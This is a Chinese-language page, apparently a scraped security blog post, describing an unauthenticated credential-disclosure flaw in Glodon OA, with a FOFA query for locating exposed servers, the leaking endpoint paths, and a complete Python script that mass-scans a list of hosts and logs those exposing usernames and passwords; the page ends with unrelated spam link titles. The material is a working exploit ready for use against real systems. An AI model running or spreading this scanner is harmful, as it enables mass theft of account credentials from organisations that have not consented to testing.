当前位置: 首页 > news >正文

网站建设步骤及分工快手直播间挂人气自助网站

网站建设步骤及分工,快手直播间挂人气自助网站,网站开发中应注意哪些问题,网站 功能需求漏洞描述 广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端云大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权&#xff0c…

漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑,提供一百余款基于“端+云+大数据”产品/服务,提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞,由于某些接口没有鉴权,导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  def get_url(file):  with open(file, 'r', encoding='utf-8') as f:  for url in f:  url = url.replace('\n', '')  if "http" not in url:  url = "http://" + url  parsed_url = urlsplit(url)  base_url = parsed_url.scheme + "://" + parsed_url.netloc  send_req(base_url)  def write_result(content):  with open("result.txt", "a", encoding="UTF-8") as f:  f.write('{}\n'.format(content))  warnings.filterwarnings("ignore", category=InsecureRequestWarning)  def send_req(url_check):  url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  header = {  "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  'Connection': 'close'  }  try:  response = requests.get(url=url, headers=header, verify=False, timeout=3)  if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  if response.status_code == 200:  result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  write_result(result2)  time.sleep(1)  except Exception as e:  pass  if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-f", "--file", help="URL地址文件")  args = parser.parse_args()  if args.file:  get_url(args.file)  else:  print("使用-f加url文件地址")

执行效果

http://www.yayakq.cn/news/535159/

相关文章:

  • 智能创作平台seo关键词优化
  • 一流导航设计网站中山精品网站建设资讯
  • 专业手机网站有哪些wordpress按钮弹图片
  • 推广类网站网店推广方法
  • 沙坪建设集团网站网站开发中间商怎么做
  • asp.net 网站授权网站建设上传文件
  • 做网站方面的问题全国知名网站排名
  • 汕头网站推广系统网络营销品牌推广公司
  • 视频模板网站推荐小蜜蜂wordpress采集
  • 医院如何做网站策划网站简繁体转换 js
  • 仙桃市建设局网站程序员联系方式
  • 网站正能量入口企业网站建设的主要内容
  • 不同的网站有不同的风格公司变更通知
  • 哪个网站可以做鸟瞰图wordpress 注册登陆插件
  • 丰台网站建设报价注册电气师在哪个网站做变更
  • 域名绑定网站提示正在建设公司网站建设推合同
  • 南昌企业制作网站设计近期时事新闻
  • 网站风格设计视觉app开发价格表
  • 做视频网站流量费高吗深圳外贸网站制作公司
  • 阿里云做网站企业注册公司
  • 英文网站建站山东公司注册在哪里合适
  • 创业开网站建设公司适合团购报名的网站开发
  • angularjs 网站开发设计专业就业方向
  • 网站建设毕业设计刻光盘wordpress扒主题代码
  • 平顶山高端网站建设iis架设网站教程
  • 网站开发转行进入衍生领域如何卸载本地安装的wordpress
  • 主机 可以 多少 网站管理咨询公司利润率
  • 设计公司logo网站做产品的往这看:国外工业设计网站大全!
  • 石家庄网站建设招商顶呱呱网站建设是外包的吗
  • 在东莞建公司网站网站开发 岗位职责